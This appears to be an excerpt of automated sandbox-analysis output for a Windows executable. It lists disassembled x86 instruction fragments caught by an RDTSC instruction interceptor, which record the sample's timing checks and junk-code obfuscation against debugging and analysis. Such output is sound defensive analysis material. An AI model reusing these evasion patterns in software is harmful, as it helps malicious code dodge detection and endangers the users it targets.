Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51403E3 second address: 5140487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 sub cx, 8FBEh 0x0000000e jmp 00007FC22D01ECD9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jg 00007FC29EB0CD38h 0x0000001f jmp 00007FC22D01ECCCh 0x00000024 js 00007FC22D01ECF7h 0x0000002a jmp 00007FC22D01ECD0h 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 pushad 0x00000033 movzx ecx, di 0x00000036 push ebx 0x00000037 movzx ecx, bx 0x0000003a pop ebx 0x0000003b popad 0x0000003c jne 00007FC29EB0CD12h 0x00000042 jmp 00007FC22D01ECCEh 0x00000047 mov ebx, dword ptr [ebp+08h] 0x0000004a jmp 00007FC22D01ECD0h 0x0000004f lea eax, dword ptr [ebp-2Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC22D01ECCAh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140487 second address: 5140496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140496 second address: 51404C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECCDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404C3 second address: 51404FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22CC1B8ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51404FA second address: 5140558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6A3D4A12h 0x00000008 pushfd 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e sub si, 720Eh 0x00000013 jmp 00007FC22D01ECD9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC22D01ECCAh 0x00000026 add cx, 8088h 0x0000002b jmp 00007FC22D01ECCBh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140558 second address: 5140617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8B6h 0x0000000c sub ecx, 4760E2E8h 0x00000012 jmp 00007FC22CC1B8ABh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC22CC1B8AFh 0x00000021 add si, DA2Eh 0x00000026 jmp 00007FC22CC1B8B9h 0x0000002b popfd 0x0000002c mov edx, eax 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC22CC1B8B8h 0x00000037 and cl, FFFFFFD8h 0x0000003a jmp 00007FC22CC1B8ABh 0x0000003f popfd 0x00000040 mov esi, 2989AD8Fh 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC22CC1B8B2h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FC22CC1B8B3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140617 second address: 514061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 514067C second address: 51406AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FC22CC1B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8ABh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51406AC second address: 51307F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 popad 0x0000000a je 00007FC29EB0CC5Bh 0x00000010 xor eax, eax 0x00000012 jmp 00007FC22CFF83FAh 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 xor ebx, ebx 0x00000026 cmp esi, 00000000h 0x00000029 je 00007FC22D01EE05h 0x0000002f call 00007FC2317CB4F7h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 51307F0 second address: 5130803 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC22CC1B8AAh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130803 second address: 513083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FC22D01ECD6h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22D01ECD7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513083D second address: 5130879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC22CC1B8ABh 0x0000000b xor esi, 0B459B0Eh 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130879 second address: 513087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 513087D second address: 5130883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5130883 second address: 51308DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD0h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov esi, 34900AC9h 0x00000015 pushfd 0x00000016 jmp 00007FC22D01ECD6h 0x0000001b sbb eax, 25B9F718h 0x00000021 jmp 00007FC22D01ECCBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 655FDCE1h 0x00000031 mov cx, 661Dh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140A99 second address: 5140AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AA9 second address: 5140AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140AAD second address: 5140B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8B8h 0x00000013 jmp 00007FC22CC1B8B5h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC22CC1B8B0h 0x0000001f jmp 00007FC22CC1B8B5h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B11 second address: 5140B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140B17 second address: 5140B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [76C8459Ch], 05h 0x00000012 jmp 00007FC22CC1B8B6h 0x00000017 je 00007FC29E6F9758h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 13067270h 0x00000025 jmp 00007FC22CC1B8B9h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C98 second address: 5140C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140C9E second address: 5140CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D27 second address: 5140D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCEh 0x00000008 call 00007FC22D01ECD2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FC29EAF28FDh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D59 second address: 5140D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5140D5F second address: 5140D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7A second address: 5150A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A7E second address: 5150A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150A84 second address: 5150AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC22CC1B8B0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bx, 3D80h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov bl, al 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150AB8 second address: 5150B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC22D01ECD3h 0x0000000b adc ecx, 2DD8A55Eh 0x00000011 jmp 00007FC22D01ECD9h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007FC22D01ECCEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, di 0x00000029 pushfd 0x0000002a jmp 00007FC22D01ECD9h 0x0000002f and esi, 1E5BD4F6h 0x00000035 jmp 00007FC22D01ECD1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B3F second address: 5150B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov eax, 3DEF4973h 0x00000011 mov di, cx 0x00000014 popad 0x00000015 je 00007FC29E6E90FDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150B6E second address: 5150B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 5150CE9 second address: 5150D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 651DFBB second address: 651DFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC22D01ECC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E6A second address: 66A2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2E73 second address: 66A2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21B0 second address: 66A21E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22CC1B8B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A21E3 second address: 66A21FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A2391 second address: 66A239B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A250D second address: 66A253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC22D01ECC6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC22D01ECE0h 0x00000017 jnl 00007FC22D01ECC6h 0x0000001d jmp 00007FC22D01ECD4h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26BF second address: 66A26C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26C3 second address: 66A26EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC22D01ECC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EB second address: 66A26EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A26EF second address: 66A26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A47CE second address: 66A47D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A493E second address: 66A4A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD7h 0x0000000a popad 0x0000000b nop 0x0000000c jng 00007FC22D01ECC9h 0x00000012 mov cx, di 0x00000015 push 00000000h 0x00000017 call 00007FC22D01ECC9h 0x0000001c jno 00007FC22D01ECCAh 0x00000022 push eax 0x00000023 jc 00007FC22D01ECD4h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push ecx 0x0000002e pushad 0x0000002f jmp 00007FC22D01ECCAh 0x00000034 push eax 0x00000035 pop eax 0x00000036 popad 0x00000037 pop ecx 0x00000038 mov eax, dword ptr [eax] 0x0000003a jo 00007FC22D01ECCEh 0x00000040 jo 00007FC22D01ECC8h 0x00000046 pushad 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d jmp 00007FC22D01ECD3h 0x00000052 pop eax 0x00000053 pop eax 0x00000054 mov dword ptr [ebp+122D3B1Fh], ecx 0x0000005a mov edx, ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 push 00000000h 0x00000063 mov edi, 4C140527h 0x00000068 push 00000003h 0x0000006a call 00007FC22D01ECD0h 0x0000006f mov edi, dword ptr [ebp+122D2F7Dh] 0x00000075 pop esi 0x00000076 push 5FD3E9ECh 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007FC22D01ECC6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4A08 second address: 66A4A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC22CC1B8A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 add dword ptr [esp], 602C1614h 0x0000001a mov ecx, dword ptr [ebp+122D2ED9h] 0x00000020 lea ebx, dword ptr [ebp+1245A6B2h] 0x00000026 mov dword ptr [ebp+122D36AAh], ecx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push edi 0x0000002f je 00007FC22CC1B8A6h 0x00000035 pop edi 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC22CC1B8B0h 0x0000003f jmp 00007FC22CC1B8B9h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AE8 second address: 66A4AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22D01ECC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AF3 second address: 66A4AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4AFD second address: 66A4B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CBDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d stc 0x0000002e mov dword ptr [ebp+122D3A72h], esi 0x00000034 sub dword ptr [ebp+122D3ACCh], eax 0x0000003a push ADF7B0D2h 0x0000003f pushad 0x00000040 je 00007FC22D01ECCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4B4D second address: 66A4B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66A4C33 second address: 66A4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6695CE6 second address: 6695CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4D53 second address: 66C4DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FC22D01ECCDh 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC22D01ECD6h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C4DA9 second address: 66C4DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5173 second address: 66C5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FC22D01ECC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C52ED second address: 66C52F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C547E second address: 66C5483 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5973 second address: 66C5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22CC1B8B4h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E42 second address: 66C5E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E4D second address: 66C5E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 66C5E6F second address: 66C5E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E74 second address: 6689E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E78 second address: 6689E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E87 second address: 6689E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689E8D second address: 6689EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22D01ECCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC22D01ECCCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB3 second address: 6689EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EB7 second address: 6689EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EBB second address: 6689EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: 6689EC1 second address: 6689EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
